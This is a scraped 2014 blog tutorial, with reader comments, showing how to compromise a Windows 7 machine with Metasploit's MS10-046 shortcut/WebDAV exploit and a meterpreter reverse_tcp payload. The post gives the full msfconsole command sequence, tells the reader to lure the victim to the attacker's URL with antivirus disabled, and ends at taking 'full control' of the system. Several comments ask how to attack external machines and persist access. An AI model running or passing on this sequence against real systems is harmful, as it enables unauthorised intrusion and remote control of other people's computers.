hack windows 7 with metasploit using kali linux _ linux digest
DESCRIPTION
Exploit Windows 7 Dengan Metasploit Di Kali Linux - Anherr Blog'sTRANSCRIPT
3/9/2015 Hack Windows 7 with Metasploit using Kali Linux | LINUX DIGEST
https://sathisharthars.wordpress.com/2014/05/21/hackwindows7withmetasploitusingkalilinux/ 1/22
LINUX DIGEST
A Linux Engineer and Security Researcher Blog
Hack Windows 7 with Metasploit using Kali Linux
Filed under: ETHICAL HACKING, KALI LINUX — 28 CommentsMay 21, 2014
Today i am gonna show how to exploit any windows OS using metasploit. Exploiting a windowsvulnerability to logging into the system with out username and password using Metasploit.
Before Hacking, you want to know about metasploit framework. If your are new one to hacking,its less possible to know about Metasploit.
3/9/2015 Hack Windows 7 with Metasploit using Kali Linux | LINUX DIGEST
https://sathisharthars.wordpress.com/2014/05/21/hackwindows7withmetasploitusingkalilinux/ 2/22
Metasploit Project is a computer security project that provides information about securityvulnerabilities and aids in penetration testing and IDS signature development.
Its best‑known sub‑project is the open source Metasploit Framework, a tool for developing andexecuting exploit code against a remote target machine. Other important sub‑projects include theOpcode Database, shellcode archive and related research.
The Metasploit Project is well known for its anti‑forensic and evasion tools, some of which arebuilt into the Metasploit Framework.
Requirements:
1. MetaSploit Installed ( Kali Linux Distribution)
2. Ruby Installed (Install all the package of Ruby to avoid any issues)
3. Two OS running either on same as virtual or physically different
4. Target host must not be running any AV
Machine 1: Host Kali Linux Machine
3/9/2015 Hack Windows 7 with Metasploit using Kali Linux | LINUX DIGEST
https://sathisharthars.wordpress.com/2014/05/21/hackwindows7withmetasploitusingkalilinux/ 3/22
Machine 2: Target Windows 7 Machine
Msfconsole is by far the most popular part of the Metasploit Framework, and for good reason. It isone of the most flexible, feature‑rich, and well‑
supported tools within the Framework. Msfconsole provides a handy all‑in‑one interface toalmost every option and setting available in the Framework; it’s like a one‑stop shop for all ofyour exploitation dreams.
To launch msfconsole, enter msfconsole at the command line
#msfconsole
3/9/2015 Hack Windows 7 with Metasploit using Kali Linux | LINUX DIGEST
https://sathisharthars.wordpress.com/2014/05/21/hackwindows7withmetasploitusingkalilinux/ 4/22
Now once you get the msf prompt type the below command and look for the moduleexploit/windows/browser/ms10_046_shortcut_icon_dllloader.
An exploit is the means by which an attacker, or pen tester for that matter, takes advantage of aflaw within a system, an application, or a service. An attacker uses an exploit to attack a system ina way that results in a particular desired outcome that the developer never intended.
Here above module exploits a vulnerability in the handling of Windows Shortcut files (.LNK) thatcontain an icon resource pointing to a malicious DLL.This module creates a WebDAV service thatcan be used to run an arbitrary payload when accessed as a UNC path.
Now once we have found the desired module we will use this exploit by typing the below
3/9/2015 Hack Windows 7 with Metasploit using Kali Linux | LINUX DIGEST
https://sathisharthars.wordpress.com/2014/05/21/hackwindows7withmetasploitusingkalilinux/ 5/22
Now once we have found the desired module we will use this exploit by typing the belowcommand.
#msf > use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
Once loaded your msf prompt should be inclusive of the loaded exploit. given below is the image
Now once the exploit is loaded we will set the payload for the above select exploit. In our scenariowill be using reverse TCP payload. Type the below command to set payload.
A payload is code that we want the system to execute and that is to be selected and delivered by
3/9/2015 Hack Windows 7 with Metasploit using Kali Linux | LINUX DIGEST
https://sathisharthars.wordpress.com/2014/05/21/hackwindows7withmetasploitusingkalilinux/ 6/22
A payload is code that we want the system to execute and that is to be selected and delivered bythe Framework. A reverse shell is a payload that
creates a connection from the target machine back to the attacker as a Windows commandprompt, whereas a bind shell is a payload that
“binds” a command prompt to a listening port on the target machine, which the attacker can thenconnect.
#msf > set payload windows/meterpreter/reverse_tcp
Now its time to do some configuration for the exploit/payload that we have just set. type thegiven command
3/9/2015 Hack Windows 7 with Metasploit using Kali Linux | LINUX DIGEST
https://sathisharthars.wordpress.com/2014/05/21/hackwindows7withmetasploitusingkalilinux/ 7/22
#msf > show options
You should get below default output.
Now we have to set the local host to listen. Type the given below two commands.
#msf > set SRVHOST 192.168.31.20
This will be your HOST IP address running metasploit.
#msf > set LHOST 192.168.31.20
3/9/2015 Hack Windows 7 with Metasploit using Kali Linux | LINUX DIGEST
https://sathisharthars.wordpress.com/2014/05/21/hackwindows7withmetasploitusingkalilinux/ 8/22
This will be also be your HOST IP address running metasploit.
Now check if the above applied configuration is applied.
#msf > show options
3/9/2015 Hack Windows 7 with Metasploit using Kali Linux | LINUX DIGEST
https://sathisharthars.wordpress.com/2014/05/21/hackwindows7withmetasploitusingkalilinux/ 9/22
Now Finally we will start to exploit. Run the command Exploit.
#msf > exploit
3/9/2015 Hack Windows 7 with Metasploit using Kali Linux | LINUX DIGEST
https://sathisharthars.wordpress.com/2014/05/21/hackwindows7withmetasploitusingkalilinux/ 10/22
Once executed we should “Server Started” (Make sure that your server is not running any webservice on port 80)
On any Client machine simply open Internet Explorer and try to open http://192.168.31.20
3/9/2015 Hack Windows 7 with Metasploit using Kali Linux | LINUX DIGEST
https://sathisharthars.wordpress.com/2014/05/21/hackwindows7withmetasploitusingkalilinux/ 11/22
Note: it will give your a pop‑up asking from permission click ALLOW and Make sure you do nothave any AntiVirus running on the target PC.
You can check the number of successful connected session by running the command sessons inmsf console.
Now as we can see that we have one victim connected its time to login to the system. run thecommand session ‑i 1.
#meterpeter > session ‑i 1
Once connected type linux command to browse inside the System and have full control on it.
3/9/2015 Hack Windows 7 with Metasploit using Kali Linux | LINUX DIGEST
https://sathisharthars.wordpress.com/2014/05/21/hackwindows7withmetasploitusingkalilinux/ 12/22
Once connected type linux command to browse inside the System and have full control on it.
This Documentation is purely for educational purpose. so act with responsibility.
Tags: Ethical Hacking, exploit, Hacking, kali linux, metasploit framework, Microsoft Windows,msfconsole, payload, window 7, windows xp
Comments RSS (Really Simple Syndication) feed
28 Comments:
sidJuly 7, 2014 at 12:01 pmhey anther good one tutorial for hacking i looking this attack over internet , i try but failed soplz make tutorial on internet user. thanks
4
3/9/2015 Hack Windows 7 with Metasploit using Kali Linux | LINUX DIGEST
https://sathisharthars.wordpress.com/2014/05/21/hackwindows7withmetasploitusingkalilinux/ 13/22
16
iRate This
ReplyTamal KunduAugust 1, 2014 at 10:14 pmIs it possible to get the meterpreter directly..i mean without any click or pinging…direct getthe meterpreter of the terget machine….as we did in case of xp by using“”exploit/windows/smb/ms08_067_netapi””please inform meplease help me
6
3
iRate This
ReplySathish ArtharAugust 2, 2014 at 10:02 amYep it will connect directly to meterpreter , its an SMB vulnerability in windows XP , if thesystem is patched mean currently updated the meterpreter will not work.
1
2
iRate This
ReplydecomboySeptember 13, 2014 at 4:43 amVery nice tutorial!!I tried this using my laptop and my desktop with windows 7 as Target.Everything went smoothly, just when I entered on http://x.x.x.x(int the targeted computer), onthe msfconsole(in the laptop) appeared “Sending UNC redirect to x.x.x.x” but nothing morehappened.
Did I do something wrong?
3/9/2015 Hack Windows 7 with Metasploit using Kali Linux | LINUX DIGEST
https://sathisharthars.wordpress.com/2014/05/21/hackwindows7withmetasploitusingkalilinux/ 14/22
Did I do something wrong?ms10_046_shortcut_icon_dllloader – Sending UNC redirectThanks
5
1
iRate This
ReplyJoneyOctober 4, 2014 at 2:44 ami have the same issue did you find a solution?
4
1
iRate This
ReplypoopyfacetomatonoseJanuary 24, 2015 at 5:07 pmopen it in ie, it will resolve this issue
0
2
iRate This
ReplyjaredmanAugust 3, 2015 at 2:04 pmi am opening it in ie but i still have this problem
0
0
3/9/2015 Hack Windows 7 with Metasploit using Kali Linux | LINUX DIGEST
https://sathisharthars.wordpress.com/2014/05/21/hackwindows7withmetasploitusingkalilinux/ 15/22
iRate This
FatihOctober 2, 2014 at 1:28 amYeah have the same problem here, You should tell us which Version of Windows 7 did youtest with? And edition? and was it x86 or x64? and what was the exact version of Internetexplorer?
My lab stucked on ” Sending LNK file..”
Thank you so much
1
0
iRate This
ReplyFatihOctober 2, 2014 at 2:23 amand what is the version of your rubygem please?
0
1
iRate This
ReplyFatihOctober 3, 2014 at 2:21 ameverybody in comment says they have failed. Wanna reply?
2
3
iRate This
Reply
3/9/2015 Hack Windows 7 with Metasploit using Kali Linux | LINUX DIGEST
https://sathisharthars.wordpress.com/2014/05/21/hackwindows7withmetasploitusingkalilinux/ 16/22
ReplyBYODNovember 25, 2014 at 3:34 pmSame problem as u guys, but good starting tutorial…(he’s probably not gonna chew our food for us…)
2
0
iRate This
ReplymonkyNovember 28, 2014 at 12:21 amBazzofia!
0
2
iRate This
ReplyasdfgNovember 30, 2014 at 7:00 pmIt didn’t even work for me! it probably depends on the version of the browser and if the OShas been updated. what i would like to see is a payload that works even if if was updated.
2
0
iRate This
Replyansaf.appDecember 18, 2014 at 1:35 ami am using kali linux (not virtual) so i have this when i exploit
msf exploit(firefox_xpi_bootstrapped_addon) > exploit
[‑] Exploit failed: windows/meterpreter/reverse_tcp is not a compatible payload.
3/9/2015 Hack Windows 7 with Metasploit using Kali Linux | LINUX DIGEST
https://sathisharthars.wordpress.com/2014/05/21/hackwindows7withmetasploitusingkalilinux/ 17/22
[‑] Exploit failed: windows/meterpreter/reverse_tcp is not a compatible payload.
terminal shows this message,
i need the root directory for reverse_tcp in kali linux
1
2
iRate This
ReplyNgười Đến Từ Bình DươngDecember 20, 2014 at 11:51 amReblogged this on Người Đến Từ Bình Dương.
0
0
iRate This
ReplyJackDecember 20, 2014 at 6:55 pmI cant run session ‑i 1 command..plz help… It says unknown command
0
1
iRate This
Replyウロボロス
June 9, 2015 at 10:11 pmsessions ‑i 1 ????
0
3/9/2015 Hack Windows 7 with Metasploit using Kali Linux | LINUX DIGEST
https://sathisharthars.wordpress.com/2014/05/21/hackwindows7withmetasploitusingkalilinux/ 18/22
0
iRate This
ReplySouljinJuly 6, 2015 at 12:07 pm“Now as we can see that we have one victim connected its time to login to the system.run the command session ‑i 1.”
im stuck here too anyone can tell where to input this command?
0
0
iRate This
laina gyvnaDecember 27, 2014 at 5:30 pmThe tutorial ‘s goot but the attack itself sucks. What kind of attack isthat when you need toswitch off your fw and av? Definetely not a real life attack.
0
0
iRate This
ReplyXypherJanuary 10, 2015 at 11:24 amNEED HELP.All went swell than at the *exploit* command i failed to connect . here’s the error. ” [‑] Exploitfailed: REX::BindFailed The address is already in use or unavailable: (Ip address).”The computer i was trying to exploit was my laptop running windo 7 . I disabled the avg for asecond than exited out any running browser and ran the exploit on kali from a seperatecomputer and i got that error … what does it mean?
4
3/9/2015 Hack Windows 7 with Metasploit using Kali Linux | LINUX DIGEST
https://sathisharthars.wordpress.com/2014/05/21/hackwindows7withmetasploitusingkalilinux/ 19/22
0
iRate This
ReplyaliJanuary 31, 2015 at 5:05 pmis there away to hack it without sending a link or any thing else
1
0
iRate This
ReplysubinoAugust 3, 2015 at 7:01 pmthere is no way…
0
0
iRate This
ReplyAdil AzadMarch 31, 2015 at 6:19 pmso good (Y) best i hv try this ..work good
0
0
iRate This
ReplymI c0
April 3, 2015 at 2:33 pm
3/9/2015 Hack Windows 7 with Metasploit using Kali Linux | LINUX DIGEST
https://sathisharthars.wordpress.com/2014/05/21/hackwindows7withmetasploitusingkalilinux/ 20/22
April 3, 2015 at 2:33 pmfor those stuck at the sending lnk phase (after the victim opened the created file), make surethat the av (windows defender) is off… after the victim made a session with your attacker, ameterpreter session should pop up after the sending command… verify the session number byuploading the command “sessions”…
0
0
iRate This
ReplySeabrideApril 23, 2015 at 7:53 pmYou guys should just create an exe file as the payload itself.If you want to check if it works, upload it to a file hosting server and download it to thetargeted pc and exploit it.
In this method you don’t need to configure the SRVHOST.You need to configure the LHOST to your own IP and the LPORT to any port you’d like, forexample: 4321.
For a step by step, here is a great tutorial:
BackTrack 5 - Lesson 2 - Exploiting Windows 7
Hope I helped!
3/9/2015 Hack Windows 7 with Metasploit using Kali Linux | LINUX DIGEST
https://sathisharthars.wordpress.com/2014/05/21/hackwindows7withmetasploitusingkalilinux/ 21/22
Hope I helped!
2
0
iRate This
ReplyHUNTER3DJuly 10, 2015 at 1:18 ameveryone is making tutorials based on local network , “no use” , how do we connect toexternal machine ? RHOST xxx.xxx.xx.xxx ? or different exploits ?
1
0
iRate This
ReplyHUNTER3DJuly 10, 2015 at 1:52 amor do we just broadcast exe or any relevant file to gain administrative priveleges on web …?
0
0
iRate This
ReplyPavanAugust 7, 2015 at 9:23 pmHI..how can i persist this attack?
0
0
3/9/2015 Hack Windows 7 with Metasploit using Kali Linux | LINUX DIGEST
https://sathisharthars.wordpress.com/2014/05/21/hackwindows7withmetasploitusingkalilinux/ 22/22
iRate This
Reply
Create a free website or blog at WordPress.com. | The Motion Theme.Follow
Follow “LINUX DIGEST”
Build a website with WordPress.com